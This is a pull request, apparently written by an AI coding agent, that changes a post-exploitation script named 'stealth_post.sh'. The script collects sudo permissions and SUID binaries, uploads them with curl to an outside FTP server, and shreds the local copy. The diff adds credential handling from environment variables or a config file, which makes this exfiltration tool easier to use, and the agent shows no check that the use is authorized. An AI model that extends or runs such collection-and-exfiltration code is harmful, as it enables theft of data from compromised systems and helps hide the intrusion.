### PR TITLE
Update stealth_post.sh to use FTP credentials from env

### DIFF
--- a/scripts/linux/stealth_post.sh
+++ b/scripts/linux/stealth_post.sh
@@ -1,6 +1,28 @@
 #!/bin/bash
 set -euo pipefail
 
+# Read FTP credentials from environment or optional config file
+FTP_USER="${FTP_USER:-}" 
+FTP_PASS="${FTP_PASS:-}"
+# Optional configuration file (~/.stealth_post.conf)
+CONFIG_FILE="${FTP_CONFIG_FILE:-$HOME/.stealth_post.conf}"
+
+# Source config file if variables are empty and file exists
+if [[ -z "$FTP_USER" || -z "$FTP_PASS" ]]; then
+    if [[ -f "$CONFIG_FILE" ]]; then
+        # shellcheck disable=SC1090
+        source "$CONFIG_FILE"
+        FTP_USER="${FTP_USER:-}"
+        FTP_PASS="${FTP_PASS:-}"
+    fi
+fi
+
+# Error if credentials still unset
+if [[ -z "$FTP_USER" || -z "$FTP_PASS" ]]; then
+    echo "❌ Variables FTP_USER et FTP_PASS non définies" >&2
+    exit 1
+fi
+
 # Minimal post‑exploitation collection script. It gathers basic system
 # information and sends it to a remote FTP server for analysis. This
 # exfiltration mechanism must only be used in authorized contexts such as
@@ -29,7 +51,7 @@ sudo -l 2>/dev/null | grep -v "may not" >> "$OUT"
 find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null | grep -E 'bash|python|perl|find|nmap' >> "$OUT"
 
 # Exfiltration via FTP (modification demandée)
-curl -s -T "$OUT" ftp://user:pass@ton-serveur.com/uploads/sysinfo.txt --ftp-create-dirs >/dev/null
+curl -s -T "$OUT" "ftp://$FTP_USER:$FTP_PASS@ton-serveur.com/uploads/sysinfo.txt" --ftp-create-dirs >/dev/null
 
 # Nettoyage
 shred -u "$OUT"


### PR DESCRIPTION
## Summary
- add credential handling in `stealth_post.sh`
- check environment variables and optional config file for FTP credentials
- use variables in curl command

## Testing
- `bash -n scripts/linux/stealth_post.sh`

------
https://chatgpt.com/codex/tasks/task_e_688c711461b48332977b71c0d9281014